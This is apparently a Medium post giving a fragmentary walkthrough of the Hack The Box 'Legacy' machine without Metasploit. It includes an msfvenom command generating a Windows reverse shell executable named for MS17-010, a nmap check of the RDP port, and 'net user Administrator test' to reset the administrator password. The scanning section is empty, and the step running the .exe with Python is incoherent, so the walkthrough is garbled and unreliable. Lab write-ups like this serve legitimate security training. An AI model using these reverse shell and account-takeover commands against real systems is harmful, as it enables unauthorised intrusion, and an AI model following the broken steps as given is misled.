HTB: Walkthrough without Metasploit. ~[LEGACY]

1. Scanning and Information gathering:-

2. Gaining Initial access and Exploitation

Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
python ms17-010.exe
C:\> systeminfo

3. Going beyond the flags.

here we are going to learn a new concept about RDP.

nmap -p3389
net user Administrator test



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store